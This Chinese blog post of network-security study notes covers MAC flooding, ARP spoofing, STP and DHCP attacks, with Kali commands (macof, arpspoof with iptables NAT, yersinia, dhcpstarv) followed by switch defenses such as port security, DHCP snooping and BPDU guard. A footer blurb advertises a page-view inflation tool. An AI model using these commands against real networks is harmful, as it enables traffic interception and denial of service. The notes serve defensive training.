MAC协议安全攻防

kali 攻击 输入 macof -i eth0 -i 选择网卡

防御 使用交换机的安全特性

Port Security

DCRS 需要开启 mac地址表学习使用cpu控制

mac-address-learning cpu-control

在端口上开启

switchport mode access 开启access模式

开启端口安全 (必选)

switchport port-security

进行mac地址绑定  (可省)

switchport port-security mac-address

允许几个人登录 (可省)

switchport port-security maximum 1

保护模式 (默认使用shutdown)

switchport port-security violation

四种

protect 安全违背保护模式
recovery 恢复违背状态
restrict 安全违背限制模式
shutdown 安全违背关闭模式

ARP协议安全攻防

kali 攻击 使用 arpspoof  -i 选择网卡

一.向主机B声称自己(攻击者)就是网关

arpspoof -i eth0 -t 192.168.159.132 192.168.159.2 
(192.168.159.132是我们的攻击目标、192.168.159.2是网关IP地址)

二、攻击者仅仅欺骗被攻击主机、同时在本地进行Iptable NAT转发(双向)
使用NAT技术,从服务端返回的数据包也会经过攻击者的主机了,这样,攻击者就可以在本地进行流量内容的修改、流量注入了
1. 开启端口转发,允许本机像路由器那样转发数据包
echo 1 > /proc/sys/net/ipv4/ip_forward
2. ARP投毒,向主机B声称自己(攻击者)就是网关 
arpspoof -i eth0 -t 192.168.159.132 192.168.159.2 
(192.168.159.132是我们的攻击目标、192.168.159.2是网关IP地址)
3. 使用Iptables进行NAT数据包转发
iptables -t nat -A POSTROUTING -p tcp -s 192.168.159.0/24 -j SNAT --to-source 192.168.159.254
iptables -t nat -A PREROUTING -p tcp -d 192.168.159.254 -j DNAT --to 192.168.159.132
有关Iptables的原理请参阅另一篇文章:
http://www.cnblogs.com/LittleHann/p/3708222.html
三、攻击者同时欺骗被攻击主机和网关(双向) 
在双向ARP欺骗中,攻击者仅仅充当了一个"数据包路由转发"的角色,将两个方向的数据包都进行转发
1. 开启端口转发,允许本机像路由器那样转发数据包
echo 1 > /proc/sys/net/ipv4/ip_forward
2. ARP投毒,向主机B声称自己(攻击者)就是网关 
arpspoof -i eth0 -t 192.168.159.132 192.168.159.2 
(192.168.159.132是我们的攻击目标、192.168.159.2是网关IP地址) 
这个指令翻译为中间即为: 告诉"192.168.159.132"这个人,"192.168.159.2"这个IP的MAC就是攻击者本机的MAC地址
3. ARP投毒,向网关G声称自己(攻击者)就是网关
arpspoof -i eth0 -t 192.168.159.2 192.168.159.132 
(192.168.159.2是网关IP地址、192.168.159.132是我们的攻击目标)

这个指令翻译为中间即为: 告诉"192.168.159.2"这个人,"192.168.159.132"这个IP的MAC就是攻击者本机的MAC地址

防御

方法1。 启用am

Access Management

Switch(Config)#am enable 开启
Switch(Config)#interface Ethernet 1/0/5 进入e 1/0/5
Switch(Config-Ethernet0/0/4)#am port 设置am port
Switch(Config-Ethernet0/0/4)#am mac-ip-pool 00-01-10-22-33-10 192.1.1.2 静态绑定mac和ip 一一对应起来

端口+ip+mac 绑定 对应的pass 不对应的deny

注:所有端口都需要配置 较麻烦

方法2.启用 ip snooping 功能 监听

全局

ip dhcp snooping enable 开启 ip dhcp snooping 功能
ip dhcp snooping vlan 10;20 监听 vlan 号
ip dhcp snooping binding enable 开启DHCP Snooping绑定
ip dhcp snooping binding arp     snooping 绑定arp 功能
端口

ip dhcp snooping binding user-control vlan 10 启动DHCP Snooping绑定user功能 启用vlan 10
ip dhcp snooping blocked record interval default  拒绝转发非法报文 记录时间间隔

方法3.ARP Guard 防止网关欺骗

arp-guard ip

被保护的IP地址。此后从这个端口上接收到源IP地址为<addr>的arp报文就认为报文非法,将被直接丢弃。

方法4.配置免费arp

免费arp 作用

1.确定其它设备的IP地址是否与本机IP地址冲突。 
2.设备改变了接口MAC 地址,通过发送免费ARP报文通知其他设备更新ARP表项。

3.可以防止针对网关的ARP欺骗。交换机定时向局域网内主机广播免费ARP,这样局域

网内主机的ARP缓存会定时更新,所以在局域网内主机受到针对网关的ARP欺骗后,主机会在收到交换机的免费ARP后,更新其ARP缓存而得到正确网关MAC地址,这样就防止了针对网关的ARP欺骗。

1. 一次设置两个接口的免费ARP发送功能

Switch(config)#ip gratuitous-arp 300

Switch(config)#exit  
2. 一次设计一个接口的免费ARP发送功能

Switch(config)#interface vlan 10 
Switch(Config-if-Vlan10)#ip gratuitous-arp 300

Spanning Tree协议安全

攻击

kali

yersinia stp (还有其他协议可以攻击)  -i eth0 -attack 3

-attack 有许多默认的攻击方式

0:非DOS攻击的发送配置BPDU
1:非DOS攻击发送拓扑变更BPDU
2:DOS攻击发送配置BPDU
3:DOS攻击发送拓扑变更BPDU
4:非DOS攻击申明根桥的角色
5:非DOS攻击申明其它角色
6:DOS攻击申明根桥角色with MiTM

夺取 Root Bridge 使用-attack 4

防御

1.开启spanning tree

spanning tree

2.设置spanning tree 的模式 stp rstp mstp

spanning tree mode stp/rstp/mstp

3.设置跟桥优先级

spanning-tree priority 0

4.show spanning tree

查看自己的配置是否是根交换机

5.在端口上开启 rootguard 设置端口不能成为根端口

SW(config-if-port-range)#spanning-tree rootguard

6.方法2 设置边缘端口 并 过滤bpdu 或者获取bpdu 关闭端口

SW(config-if-port-range)#spanning-tree portfast bpdufilter/bpduguard

bpdufilter 设置边缘端口过滤BPDU报文
bpduguard 设置边缘端口收到BPDU报文后关闭

dhcp 攻击

kali

yersinia dhcp (还有其他协议可以攻击)  -i eth0 -attack 0/1/2/3

在DHCP中实施攻击:
0:非DOS攻击发送RAW包
1:DOS攻击发送DISCOVER包  耗尽dhcp池内的ip地址
2:非DOS攻击创建DHCP流氓服务器 耗尽dhcp池类的地址 自己做dhcp地址池分配ip
3:DOS攻击发送释放包

耗尽dhcp池内的ip地址

使用 yersinia

yersinia dhcp -i eth0 -attack 1

使用dhcpstarv

dhcpstarv -i eth0 -e 192.168.177.128

防御 防止dhcp地址池ip耗尽

开启ip dhcp snooping enable

ip dhcp snooping vlan 设置监听的vlan

*可选

*记录非法信息功能 ip dhcp snooping blocked record enable

*端口开启记录 ip dhcp snooping blocked record interval default

*就可以 show ip dh snooping blocked all 看见非法报文

dhcp 每秒收包数

ip dhcp snooping limit-rate 5

设置trust口 就是连接dhcp服务器的端口

如果使用了交换机dhcp 功能 就选择一个在vlan里的端口 设置为trust口 或者起一个lo口 来设置dhcp trust口

默认交换机其他端口都为untrust 每秒收包数达到我们设置的包后 就会shutdown

抑制DHCP广播报文

ip dhcp broadcast suppress

防御 ip dhcp 服务器伪造

开启dhcp广播抑制 并把dhcp报文发给trust端口

ip dhcp snooping broadcast suppress

设置DHCP Snooping检测到伪装Server报文时的自定义动作

DCRS-5650(config-if-port-range)#ip dhcp snooping action shutdown

dos攻击与防御

kali 日志的更多相关文章

  1. Linux应急响应入侵排查思路

    0x00 前言 ​ 当企业发生黑客入侵.系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程,同时给出解 ...

  2. 6.【应急响应】Linux入侵排查思路

    0x01 入侵排查思路 一.账号安全 基本使用: 1.用户信息文件/etc/passwd root:x:0:0:root:/root:/bin/bash account:password:UID:GI ...

  3. Linux应急响应基础

    文件排查 敏感目录文件分析 tmp目录 命令目录 /usr/bin /usr/sbin 开机启动项 /etc/init.d /etc/init.d是/etc/rc.d/init.d的软链接 文件时间 ...

  4. LINUX系统入侵排查

    当企业发生黑客入侵.系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程,同时给出解决方案与防范措施,为 ...

  5. Linux应急响应入门——入侵排查

    点击上方"开源Linux",选择"设为星标" 回复"学习"获取独家整理的学习资料! 账号安全: 1.用户信息文件 /etc/passwd # ...

  6. kali自动化清理缓存和日志

    前几天发现kali无法正常开机,启动盘启动进去之后, 发现/var/log/目录下的日志文件太大把硬盘占满了,于是乎... 文件主要是这三个: kern.log :   包含内核产生的日志,有助于在定 ...

  7. Kali Liunx 2.0震撼来袭(附下载地址、新特性和更新日志)

    Kali 2.0昨天已经在BlackHat 2015 USA上正式发布了.无论是粉丝们还是Kali官方都对这个2.0版本抱有极大的期待和热情.这是第一个基于Debian Jessie的Kali版本,此 ...

  8. kali linux之窥看女神上网隐私(ettercap+wireshark+zenmap +dsniff)

    作者:小波 http://www.cnblogs.com/xiaobo-Linux/ 无聊就玩了玩,不要干一些坏事哟~~网上也有一些文章关于kali linux的,就实战了一番.kali是用的debi ...

  9. Kali Linux渗透基础知识整理(四):维持访问

    Kali Linux渗透基础知识整理系列文章回顾 维持访问 在获得了目标系统的访问权之后,攻击者需要进一步维持这一访问权限.使用木马程序.后门程序和rootkit来达到这一目的.维持访问是一种艺术形式 ...

随机推荐

  1. 多功能网页刷新工具,刷pv工具

    多功能网页刷新工具,刷pv工具,在线刷流量,刷PV,刷UV小牛刷新助手功能介绍:1.设置多个刷新网页地址.2.设置刷新时间3.开始工作4.其他操作:老板键:打开时自动刷新:置系统托盘5.可手动输入地址 ...

  2. MYSQL批量删除大量数据

    DELETE FROM '表' WHERE '字段'=1 会发现删除失败,因为lock wait timeout exceed的错误: 通过LIMIT参数分批删除,因为如果不用limit,删除大量数据 ...

  3. Lombok快速入门

    Lombok是简化开发的jar包 借用老师的图来说明

  4. poj 1141 Brackets Sequence 区间dp,分块记录

    Brackets Sequence Time Limit: 1000MS   Memory Limit: 65536K Total Submissions: 35049   Accepted: 101 ...

  5. python-django(框架结构)

    项目架构: 最外层myshop目录:项目的容器,没有实质性的作用 .idea:项目的配置信息.这个文件夹是自动生成,版本控制信息等,包括历史记录.无用 manage.py:(管理项目)一个实用的命令行 ...

  6. IDEA中常用的maven指令

    Maven库: http://repo2.maven.org/maven2/ Maven依赖查询: http://mvnrepository.com/ Maven常用命令:  1. 创建Maven的普 ...

  7. 关于PHP架构师进阶的一些思考

    相信大家都有感觉,就是当程序员写业务写了几年后,就会有想进阶的想法,技术方面当然就是架构师了,然后具体从哪些方面丰富自己才能个达到目的呢?大部分人可能会很迷茫,当然也包括我, 最近和很多大牛交流了一些 ...

  8. UVa156

    #include <bits/stdc++.h> using namespace std; map<string,int> cnt; vector<string> ...

  9. bittorrent 学习(四) tracker peer通讯

    看看 tracker.c文件 http_encode() 为http发送进行编码转换 int http_encode(unsigned char *in,int len1,char *out,int ...

  10. python 子进程 subpocess 的使用方法简单介绍

    python的子进程嘛,就是利用python打开一个子进程(当然像是一句废话),但是可能和我们理解的不太一样. 一:如何理解? 我们可能的理解:多开一个进程运行某个python函数(如果只想实现这个功 ...